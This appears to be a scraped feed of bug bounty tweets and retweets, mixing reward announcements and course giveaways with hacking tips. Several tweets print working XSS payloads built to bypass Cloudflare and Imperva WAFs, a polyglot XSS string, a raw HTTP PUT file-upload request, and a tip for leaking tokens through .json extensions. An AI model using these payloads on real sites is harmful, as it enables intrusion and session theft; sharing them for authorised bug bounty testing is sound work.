RT @nav1n0x: Simple LFI using my path traversal script on GitHub. Used @0xAsm0d3us’s ParamSpider to gather URLs, filtered for relevant para….

RT @GodfatherOrwa: Shame on @Hacker0x01.Please like and retweet .Previously, this platform demonstrated racial discrimination when it block….

Just received swag from @Sony via @Hacker0x01 for a valid vulnerability report! Another step forward in my #BugBounty journey. Stay consistent, stay curious!.#InfoSec #BugBountyHunter #CyberSecurity #HackerOne #ResponsibleDisclosure #EthicalHacking #RedTeam #AppSec #BugBountyWin

Proud to be recognized by NASA for my security research contributions! It's an honor to help safeguard critical systems and support the mission of space exploration. Grateful for this acknowledgment! 🚀🔒 #NASA #CyberSecurity #BugBounty #Bugcrowd #EthicalHacking

RT @0x0SojalSec: Bypass Cloudflare WAF (DOM-based XSS) ♻️. Payload:.'-alert?.(1)-' . writeup: #infosec #cybersec #….

RT @NahamSec: Final giveaway of the year🎁: .4️⃣Hand-On Web Exploitation (Course Only .3️⃣Shodan Codes.2️⃣Caido lic….

RT @hunter0x7: Update no 7: Reported 50 submissions (total). 1. XSS Bypass: <form><math><mtext></form><form><mglyph><style></math><img sr….

RT @Jhaddix: 🛑 GIVEAWAY ALERT 🛑. Today is DAY TWO of FIVE DAYS of @arcanuminfosec and friends Black Friday and Cyber Monday giveaways!. To….

RT @ProjectSEKAIctf: 🎁 End of Year Giveaway 🎁 . Hack The Box 6-month VIP+ x1.- Follow, Like, and Retweet to join!.- Winner will be picked r….

RT @NahamSec: 🎯 Black Friday Special+ Giveaway: . Get the full course for just $29 (reg. $119) at with code 'FRIDAY2024'! .

This payload uses layered encoding, tag closure tricks, and event triggers to evade filters and execute JavaScript across multiple contexts. #CyberSecurity #InfoSec #EthicalHacking #BugBounty #CyberThreats #Vulnerability #Malware #ZeroDay #bugbountytips #bugbountytip.

🚨 Ultimate #XSS Payload for Every Scenario! 🚨.JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/* <!--</Title/</Style/</Script/</textArea/</iFrame> \74k<K/contentEditable/autoFocus/OnFocus= /*${/*/;{/**/(import(/https:\\)}//\76-->. By @RodoAssis.

🔍✨ Revealing sensitive data leaks with .json!. Pro tip: Adding a .json extension to your request might uncover hidden secret like accessing a secret token!. #bugbounty #bugbountytips #cybersecurity #hackerone #vulnerability #Hackers #web #protip #infosecurity

Here is the workflow:. This payload injects an onmouseover event in the HTML, triggering alert(document.domain) when a user hovers over the element. Simple but powerful for finding open XSS vectors!.

Again, I scored $500 for another XSS vulnerability! 💰 . This time, I used the payload:- . %22%20onmouseover=alert(document.domain)%20x=%22. #bugbounty #infosec #XSS #bugbountytip #bugbountytips #Dhanteras #pentesting #webhacking #hackerone #bugcrowd

RT @0x0SojalSec: A solid XSS payload that bypasses Imperva WAF ⚙️. <a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][….

(1/3). 📢 Remember, an open PUT method can expose your server to unauthorized file uploads. Verify your configurations and secure it now!.

(1/2). PUT /testing-put.txt HTTP/1.1.Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4).Content-Length: 11.Content-Type: text/plain. POC+BY+AMIT.

🚨 Security Alert: PUT method is enabled! 🚨. 💰 Just grabbed $350 on @Bugcrowd ! 🐛✨. Hunting for bugs pays off! On to the next vulnerability! #BugBounty #CyberSecurity #Bugcrowd #HackThePlanet #Bugbountytip #bugbountytips . (1/1)

🚨 Reflected XSS Alert! 🚨 Discovered a filter bypass using CSS & JavaScript tags to trigger an alert on document.domain! Payload breakdown:. --%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(document.domain)%3C/scRipt%3E. #bugbountytips #bugbountytip #InfoSec #XSS